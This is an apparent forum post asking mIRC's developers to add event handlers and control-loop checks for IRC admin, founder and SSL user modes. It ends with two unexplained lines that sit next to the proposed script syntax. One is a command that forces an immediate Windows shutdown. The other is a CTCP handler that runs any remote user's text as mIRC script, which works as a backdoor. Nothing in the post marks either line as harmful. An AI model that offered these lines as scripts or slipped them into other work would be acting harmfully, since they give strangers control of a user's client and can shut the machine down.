Well, since Rizon is now updating the ircd to include admin and founder modes, and I know that other networks have these modes as well, I was thinking it would be a nice addition to mirc to have command extensions to include these modes. Trying to update my scripts to reflect these modes is rather difficult when there is no easy way to check a few things without using rather roundabout ways. There were easy ways to check things like if the user is an op/hop/voice/reg but nothing for admin/founder or other modes that other ircd's may include, and since these other ircd's, that also have these modes, are quite popular, something like these would help a lot, for everyone.

on *:admin:#:
on *:deadmin:#:
on *:founder:#:
on *:defounder:#:

for control loops:
isadmin and isfounder

for ssl things, something like:
$nick(#,nick).isssl or just $isssl($nick)
perhaps even "isssl" in control loop type syntax

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}